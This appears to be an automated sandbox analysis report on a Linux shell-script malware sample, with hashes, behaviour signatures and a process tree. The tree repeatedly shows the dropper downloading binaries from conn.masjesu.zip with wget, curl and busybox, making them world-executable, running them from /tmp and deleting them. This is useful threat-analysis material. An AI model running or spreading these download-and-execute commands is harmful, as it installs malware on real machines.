Analysis
-
max time kernel
94s -
max time network
97s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
24/11/2024, 01:26
Static task
static1
Behavioral task
behavioral1
Sample
d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh
-
Size
10KB
-
MD5
69e3df199d5f354bf5297b390b090569
-
SHA1
4288b90a27f9f783a5683ef8d6d13b494680b611
-
SHA256
d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7
-
SHA512
6d2e7020f72b1720ffe5fdf30d927c87ac5b9bcbb327d4b52ce629f45ec7de5c180a03773bc3e840b9a3bbb4fae5e03edef53016476059ac8c6c60eeb54523cd
-
SSDEEP
192:AOyeXwg9lHemldOY48OkgSemldOY53yeXwgfN:AOlemlcY48OkgSemlcYFN
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Reads runtime system information
description: File opened for reading; ioc: /proc/sys/crypto/fips_enabled; Process: curl
-
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh/tmp/d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:714
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- System Network Configuration Discovery
PID:716
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- System Network Configuration Discovery
PID:741
-
-
/bin/chmodchmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:744
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- System Network Configuration Discovery
PID:745
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- System Network Configuration Discovery
PID:748
-
-
/bin/chmodchmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:751
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- System Network Configuration Discovery
PID:752
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:761
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- System Network Configuration Discovery
PID:769
-
-
/bin/chmodchmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- File and Directory Permissions Modification
PID:777
-
-
/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Executes dropped EXE
PID:779
-
-
/bin/rmrm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:782
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- System Network Configuration Discovery
PID:783
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- System Network Configuration Discovery
PID:807
-
-
/bin/chmodchmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:810
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- System Network Configuration Discovery
PID:811
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- System Network Configuration Discovery
PID:814
-
-
/bin/chmodchmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:817
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- System Network Configuration Discovery
PID:818
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- System Network Configuration Discovery
PID:834
-
-
/bin/chmodchmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:846
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- System Network Configuration Discovery
PID:848
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- System Network Configuration Discovery
PID:861
-
-
/bin/chmodchmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT./Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:864
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:865
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:868
-
-
/bin/chmodchmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:871
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- System Network Configuration Discovery
PID:872
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- System Network Configuration Discovery
PID:875
-
-
/bin/chmodchmod 777 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB./KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:878
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- System Network Configuration Discovery
PID:879
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- System Network Configuration Discovery
PID:882
-
-
/bin/chmodchmod 777 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR./05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:885
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- System Network Configuration Discovery
PID:886
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- System Network Configuration Discovery
PID:889
-
-
/bin/chmodchmod 777 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5./jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵PID:892
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- System Network Configuration Discovery
PID:893
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:896
-
-
/bin/chmodchmod 777 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey./nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:899
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:900
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- System Network Configuration Discovery
PID:903
-
-
/bin/chmodchmod 777 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O./qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:906
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- System Network Configuration Discovery
PID:907
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- System Network Configuration Discovery
PID:910
-
-
/bin/chmodchmod 777 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5./pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵PID:913
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- System Network Configuration Discovery
PID:914
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:917
-
-
/bin/chmodchmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:920
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:921
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- System Network Configuration Discovery
PID:924
-
-
/bin/chmodchmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:927
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- System Network Configuration Discovery
PID:928
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- System Network Configuration Discovery
PID:931
-
-
/bin/chmodchmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT./Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:934
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:935
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:938
-
-
/bin/chmodchmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:941
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- System Network Configuration Discovery
PID:942
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- System Network Configuration Discovery
PID:945
-
-
/bin/chmodchmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:948
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:949
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- System Network Configuration Discovery
PID:952
-
-
/bin/chmodchmod 777 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR./05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:955
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- System Network Configuration Discovery
PID:956
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- System Network Configuration Discovery
PID:959
-
-
/bin/chmodchmod 777 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5./jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵PID:962
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:963
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- System Network Configuration Discovery
PID:966
-
-
/bin/chmodchmod 777 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB./KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:969
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- System Network Configuration Discovery
PID:970
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- System Network Configuration Discovery
PID:973
-
-
/bin/chmodchmod 777 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O./qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:976
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- System Network Configuration Discovery
PID:977
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- System Network Configuration Discovery
PID:980
-
-
/bin/chmodchmod 777 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5./pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵PID:983
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- System Network Configuration Discovery
PID:984
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:985
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- System Network Configuration Discovery
PID:987
-
-
/bin/chmodchmod 777 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey./nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:990
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:991
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- System Network Configuration Discovery
PID:994
-
-
/bin/chmodchmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- File and Directory Permissions Modification
PID:995
-
-
/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Executes dropped EXE
PID:996
-
-
/bin/rmrm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:997
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- System Network Configuration Discovery
PID:998
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:999
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- System Network Configuration Discovery
PID:1001
-
-
/bin/chmodchmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- File and Directory Permissions Modification
PID:1002
-
-
/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Executes dropped EXE
PID:1003
-
-
/bin/rmrm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:1004
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- System Network Configuration Discovery
PID:1005
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1006
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- System Network Configuration Discovery
PID:1008
-
-
/bin/chmodchmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- File and Directory Permissions Modification
PID:1009
-
-
/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
